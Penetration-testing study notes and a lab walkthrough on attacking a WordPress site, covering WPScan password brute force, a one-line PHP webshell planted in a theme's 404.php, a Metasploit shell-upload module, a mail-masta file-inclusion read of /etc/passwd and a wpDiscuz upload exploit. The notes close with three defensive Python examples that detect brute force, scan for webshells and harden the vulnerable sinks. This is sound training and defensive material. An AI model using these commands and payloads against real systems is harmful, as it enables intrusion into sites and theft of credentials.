# Intro

- There are multiple ways we can abuse `built-in functionality` to attack a WordPress installation
- Below covers login brute forcing against the `wp-login.php` page and remote code execution via the theme editor
- These two tactics build on each other, as we first need to obtain valid credentials for an administrator-level user to log in to the WordPress back-end and edit a theme

# Login Bruteforce

- `WPScan` can be used to brute force usernames and passwords
- The scan report in the previous section returned two users registered on the website (admin and john)
- The tool uses two kinds of login brute force attacks:
	- [xmlrpc](https://kinsta.com/blog/xmlrpc-php/), the faster method, uses the WordPress API to make login attempts through `/xmlrpc.php`
	- `wp-login`, which attempts to brute force the standard WordPress login page
- Below is an example using the `xmlrpc` method for a password attack

```bash
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local
# --password-attack flag is used to supply the type of attack
# -U argument takes in a list of users or a file containing user names
# -P argument takes in a list of passwords or a file containing passwords
# -t flag specifies the number of threads which we can adjust up or down
```

- Below is an example for user enumeration

```bash
sudo wpscan -t 20 --url http://blog.inlanefreight.local --enumerate u
```

# RCE

- With administrative access to WordPress, we can modify the PHP source code to execute system commands
- So, log into WordPress with the credentials for the `john` user, which redirects us to the admin panel
- Then, click on `Appearance` on the side panel and select `Theme Editor`
- This page lets us edit the PHP source code directly
- An inactive theme can be selected to avoid corrupting the primary theme
- After selecting an inactive theme, edit an uncommon page such as `404.php` to add a simple webshell

```php
system($_GET[0]);
```

![[images/Pasted image 20260118193631.png]]

- After adding the webshell to `404.php`, click on `Update File` at the bottom to save
- We know that WordPress themes are located at `/wp-content/themes/<theme name>`; thus, we can interact with the webshell via the browser or using `cURL`

```bash
curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id
```

## MSF Approach

- The [wp_admin_shell_upload](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload/) module from Metasploit can be used to upload a shell and execute it automatically
- The module uploads a malicious plugin and then uses it to execute a PHP Meterpreter shell

```bash
sudo msfconsole -q
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options
# set USERNAME, PASSWORD, RHOSTS, RPORT, VHOST
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
meterpreter > getuid
```

# Leveraging Known Vulns

- Over the years, WordPress core has suffered from some vulns, but the vast majority of them are found in plugins
- According to the WordPress Vulnerability Statistics page hosted [here](https://wpscan.com/statistics), at the time of writing there were 23,595 vulnerabilities in the `WPScan` database
	- 4% WordPress core
	- 89% plugins
	- 7% themes

## Vulnerable Plugins - `mail-masta`

- Since 2016 the `mail-masta` plugin has suffered from unauthenticated SQLi and LFI vulns
- Below is the vulnerable PHP code for this plugin

```php
<?php
include($_GET['pl']);
global $wpdb;
$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix .
    "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from $masta_reports where camp_id=$camp_id and status=1");
echo $count[0]->co;
?>
```

- As shown above, the `pl` parameter allows us to include a file without any input validation or sanitization
- Using this, we can include arbitrary files on the webserver
- Below is an example using `cURL`

```bash
curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
```

## Vulnerable Plugins - `wpDiscuz`

- [wpDiscuz](https://wpdiscuz.com/) is a WordPress plugin for enhanced commenting on page posts
- The plugin had over [1.6 million downloads](https://wordpress.org/plugins/wpdiscuz/advanced/) and over 90K active installations, making it an extremely popular plugin
- Based on the version number (7.0.4), this [exploit](https://www.exploit-db.com/exploits/49967) has a pretty good shot of getting us command execution
- This is a file upload bypass, because `wpDiscuz` is intended only to allow image attachments
- However, the file MIME type checks could be bypassed, allowing an unauthenticated attacker to upload a malicious PHP file and gain RCE

```bash
python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1
# the -p flag specifies the path to a valid post
```

- While the above exploit may not give us full RCE, it still writes a webshell that we can access using `cURL`
- We just need to append `?cmd=` after the `.php` extension to run commands, as we can see in the exploit script

```bash
curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id
```

# Exercise

## takeaways

- While Apache's default webroot is `/var/www/html`, if we are dealing with vHosts, visit `/var/www` and go into the individual vHost sub-webroots

## initial enum

- `ping` test

![[images/Pasted image 20260118195332.png]]

- `nmap` scans

![[images/Pasted image 20260118195327.png]]
![[images/Pasted image 20260118202022.png]]
- update `/etc/hosts`

![[images/Pasted image 20260118195320.png]]

## user enum

- note that if no `--username/s` option is supplied, user enum will be run

![[images/Pasted image 20260118195720.png]]

```bash
sudo wpscan -t 20 --url http://blog.inlanefreight.local
```

![[images/Pasted image 20260118195912.png]]

- let's specify a usernames list
- same results as above

![[images/Pasted image 20260118200150.png]]

- after some googling, let's try the below for username enum

```bash
sudo wpscan -t 20 --url http://blog.inlanefreight.local --enumerate u
```

- now we are getting somewhere

![[images/Pasted image 20260118200247.png]]

## password attack

- load up the below password attack

```bash
sudo wpscan --password-attack xmlrpc -t 20 -U doug -P /opt/rockyou.txt --url http://blog.inlanefreight.local
```

- we have the below password after 13 sec

![[images/Pasted image 20260118200456.png]]

## login as `doug` and read `/etc/passwd`

- browse to the admin login page at `http://blog.inlanefreight.local/wp-login.php`

![[images/Pasted image 20260118200659.png]]

- after logging in as `doug`, we see the below page

![[images/Pasted image 20260118200852.png]]

- below are the active plugins

![[images/Pasted image 20260118201005.png]]

### modify inactive theme for RCE

- view the `themes` tab under `appearance`

![[images/Pasted image 20260118201126.png]]

- transport gravity is currently active
- let's modify twenty nineteen by going to the `theme editor` tab under `appearance` and selecting the theme to edit, then select the `404 template`
- add the webshell, and click on `update file`

![[images/Pasted image 20260118201502.png]]

- indication that the file was edited successfully

![[images/Pasted image 20260118201640.png]]
![[images/Pasted image 20260118201647.png]]

- test the webshell with the below `cURL` command

```bash
curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id
```

- we have code execution

![[images/Pasted image 20260118201800.png]]

- now let's read `/etc/passwd`
![[images/Pasted image 20260118201858.png]]

## find flag

- default Apache webroot is `/var/www/html` > try to `ls` this path

![[images/Pasted image 20260118202209.png]]

- hmmm nothing
- let's `cat` `/etc/apache2/apache2.conf` to determine the webroot

![[images/Pasted image 20260118202501.png]]

- maybe the problem is we are only a member of `www-data`?
- let's list a directory above html

![[images/Pasted image 20260118202732.png]]

- since we are attacking `blog.inlanefreight.local`, let's list this directory
- here's the flag

![[images/Pasted image 20260118202823.png]]

- now let's `cat` the flag

![[images/Pasted image 20260118203121.png]]
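The `xmlrpc` and `wp-login` password attacks from the Login Bruteforce section (and the `doug` password attack in the exercise) are loud on the server side: every guess is a `POST` to `/xmlrpc.php` or `/wp-login.php`. The following is an added example, not part of the original notes, showing how a defender spots such a burst in an Apache access log. The log lines, the IPs and the `WPScan/3.x` user-agent string are constructed; the log format is assumed to be Apache combined, and the threshold and window are assumptions to tune per site.

```python
"""Added example (not from the original notes): flag login brute-force bursts
against /xmlrpc.php and /wp-login.php in an Apache combined access log."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one noisy source hammering xmlrpc.php, one normal visitor.
# The user-agent value is made up for the demo; real tools may send anything.
SAMPLE_LOG = """\
10.10.14.5 - - [18/Jan/2026:20:04:51 +0000] "POST /xmlrpc.php HTTP/1.1" 200 455 "-" "WPScan/3.x"
10.10.14.5 - - [18/Jan/2026:20:04:51 +0000] "POST /xmlrpc.php HTTP/1.1" 200 455 "-" "WPScan/3.x"
10.10.14.5 - - [18/Jan/2026:20:04:52 +0000] "POST /xmlrpc.php HTTP/1.1" 200 455 "-" "WPScan/3.x"
10.10.14.5 - - [18/Jan/2026:20:04:52 +0000] "POST /xmlrpc.php HTTP/1.1" 200 455 "-" "WPScan/3.x"
10.10.14.5 - - [18/Jan/2026:20:04:53 +0000] "POST /xmlrpc.php HTTP/1.1" 200 455 "-" "WPScan/3.x"
192.168.1.20 - - [18/Jan/2026:20:05:10 +0000] "GET /?p=1 HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
192.168.1.20 - - [18/Jan/2026:20:05:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache combined log format (assumed): ip ident user [ts] "method path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_PATHS = {"/xmlrpc.php", "/wp-login.php"}


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]  # drop query string
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: total_login_posts} for sources that POST to a login endpoint
    at least `threshold` times inside any `window`-long sliding span."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path, _status = parsed
        if method == "POST" and path in LOGIN_PATHS:
            events[ip].append(ts)

    alerts = {}
    for ip, times in events.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # shrink the window from the left until it spans at most `window`
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = len(times)
                break
    return alerts


if __name__ == "__main__":
    for ip, count in detect_bruteforce(SAMPLE_LOG).items():
        print(f"possible login brute force from {ip}: {count} login POSTs")
```

One caveat that makes the `xmlrpc` method worth a lower threshold: WordPress XML-RPC supports `system.multicall`, so a single `POST /xmlrpc.php` can carry many login attempts, and request counts alone undercount that path. Counting attempts accurately for xmlrpc needs the request body (or WordPress-side auth failure logging), while `wp-login.php` is one attempt per request.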
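The theme-editor webshell in the RCE section, the malicious plugin that `wp_admin_shell_upload` drops, and the PHP file the `wpDiscuz` exploit writes under `wp-content/uploads` all leave the same kind of evidence: a PHP file under `wp-content` that was modified, appeared, or sits where WordPress never writes code. The following is an added example, not part of the original notes, of a small integrity check a defender can run against `wp-content`: it hashes a known-good baseline, reports changed, new and deleted files, flags any `.php` under `uploads/`, and greps PHP for command-execution calls fed directly by request parameters. The directory layout and file contents are constructed in a temporary directory for the demo; the pattern list is an assumption and is deliberately narrow.

```python
"""Added example (not from the original notes): baseline-and-diff integrity check
for wp-content, plus a narrow webshell signature, run on a constructed tree."""
import hashlib
import os
import re
import tempfile

# Assumed signature: a shell-execution function fed straight from a request parameter.
SUSPICIOUS = re.compile(
    rb"\b(system|exec|shell_exec|passthru|eval)\s*\(\s*\$_(GET|POST|REQUEST)", re.I
)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map of relative path -> sha256 for every file under root (the known-good state)."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = sha256_file(full)
    return baseline


def scan(root, baseline):
    """Compare the current tree against the baseline; return sorted (relpath, reason)."""
    findings = []
    current = build_baseline(root)
    for rel, digest in current.items():
        if rel not in baseline:
            findings.append((rel, "new file"))
        elif baseline[rel] != digest:
            findings.append((rel, "modified"))
        # WordPress stores media under uploads/; executable PHP there is never legitimate
        if rel.startswith("uploads" + os.sep) and rel.lower().endswith(".php"):
            findings.append((rel, "php in uploads"))
        with open(os.path.join(root, rel), "rb") as f:
            if SUSPICIOUS.search(f.read()):
                findings.append((rel, "suspicious php"))
    for rel in baseline:
        if rel not in current:
            findings.append((rel, "deleted"))
    return sorted(findings)


def demo():
    """Constructed scenario: clean baseline, then a 404.php edit and a PHP drop in uploads."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "themes", "twentynineteen")
        os.makedirs(theme)
        os.makedirs(os.path.join(root, "uploads", "2021", "08"))
        with open(os.path.join(theme, "404.php"), "w") as f:
            f.write("<?php get_header(); ?>\n")
        baseline = build_baseline(root)

        # Tampering as described in the notes: one-liner appended to the inactive
        # theme's 404.php, and a PHP file written into the uploads directory.
        with open(os.path.join(theme, "404.php"), "a") as f:
            f.write("<?php system($_GET[0]); ?>\n")
        with open(os.path.join(root, "uploads", "2021", "08", "x.php"), "w") as f:
            f.write("<?php echo 1; ?>\n")
        return scan(root, baseline)


def demo_reasons():
    """Just the reason strings from demo(), sorted, for a quick check."""
    return sorted(reason for _path, reason in demo())


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{reason:16s} {path}")
```

In practice the baseline is taken right after a clean install or update and stored off-host, and the scan runs on a schedule; the hash diff is the reliable part, the signature only catches the crude one-liners this page uses. Disabling the theme and plugin editor with `DISALLOW_FILE_EDIT` in `wp-config.php` removes the editor path entirely, and denying PHP execution under `wp-content/uploads` at the web-server level blunts the upload path even when a plugin's own checks fail.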
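The two plugin bugs above fail for the same reason: request input reaches a sensitive sink unchecked. `mail-masta` passes `$_GET['pl']` straight to `include()` and interpolates `$_POST['camp_id']` into SQL; `wpDiscuz` trusted the client-reported MIME type of an upload. The following is an added example, not part of the original notes or of either plugin, that shows the hardened form of each sink. It is written in Python rather than PHP so it runs stand-alone: `safe_include_path` pins the include to an allowlisted directory, `count_sent` uses a parameterised query, and `is_acceptable_image` checks magic bytes plus a strict extension allowlist. The function names, the `INCLUDE_DIR` location, the allowlist and the in-memory table are assumptions for the demo.

```python
"""Added example (not from the original notes): hardened counterparts of the
mail-masta include/SQL sinks and the wpDiscuz upload check."""
import os
import sqlite3
import tempfile

# Assumed: the only directory the plugin is allowed to include templates from.
INCLUDE_DIR = os.path.join(tempfile.gettempdir(), "mail-masta-templates")


def safe_include_path(base_dir, requested):
    """Resolve `requested` under base_dir and return the real path, or None if it
    is absolute, escapes base_dir (../ or symlink), or is not a .php template."""
    if not requested or os.path.isabs(requested):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        return None
    if not target.endswith(".php"):
        return None
    return target


def count_sent(conn, camp_id):
    """Parameterised version of the vulnerable get_results() query; returns the
    count, or None if camp_id is not an integer (so "7 OR 1=1" never reaches SQL)."""
    try:
        camp_id = int(camp_id)
    except (TypeError, ValueError):
        return None
    row = conn.execute(
        "SELECT count(*) FROM masta_reports WHERE camp_id = ? AND status = 1",
        (camp_id,),
    ).fetchone()
    return row[0]


# Assumed allowlist: file signature each accepted extension must start with.
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def is_acceptable_image(filename, data, client_mime):
    """Accept only an allowlisted extension, exactly one extension, and matching
    magic bytes. client_mime is ignored on purpose: the client chooses it."""
    root, ext = os.path.splitext(os.path.basename(filename))
    ext = ext.lower()
    if ext not in MAGIC or "." in root:   # rejects .php and x.php.png alike
        return False
    return data.startswith(MAGIC[ext])


def demo_db():
    """Constructed in-memory masta_reports table: two sent rows for campaign 7."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE masta_reports (camp_id INTEGER, status INTEGER)")
    conn.executemany("INSERT INTO masta_reports VALUES (?, ?)",
                     [(7, 1), (7, 1), (7, 0), (8, 1)])
    return conn


if __name__ == "__main__":
    conn = demo_db()
    print("camp 7 sent:", count_sent(conn, "7"))
    print("injected id:", count_sent(conn, "7 OR 1=1"))
    print("/etc/passwd include:", safe_include_path(INCLUDE_DIR, "/etc/passwd"))
    print("shell.php as image:", is_acceptable_image("shell.php", b"GIF89a<?php", "image/gif"))
```

Two points the code makes that the prose does not: a valid image header does not make a `.php` file safe, so the extension allowlist is the control that actually blocks the wpDiscuz-style upload, and the magic-byte check only keeps real image types honest; and the SQL fix is the parameter, not escaping. The WordPress-native equivalent of `count_sent` is `$wpdb->prepare()` with a `%d` placeholder for `camp_id`.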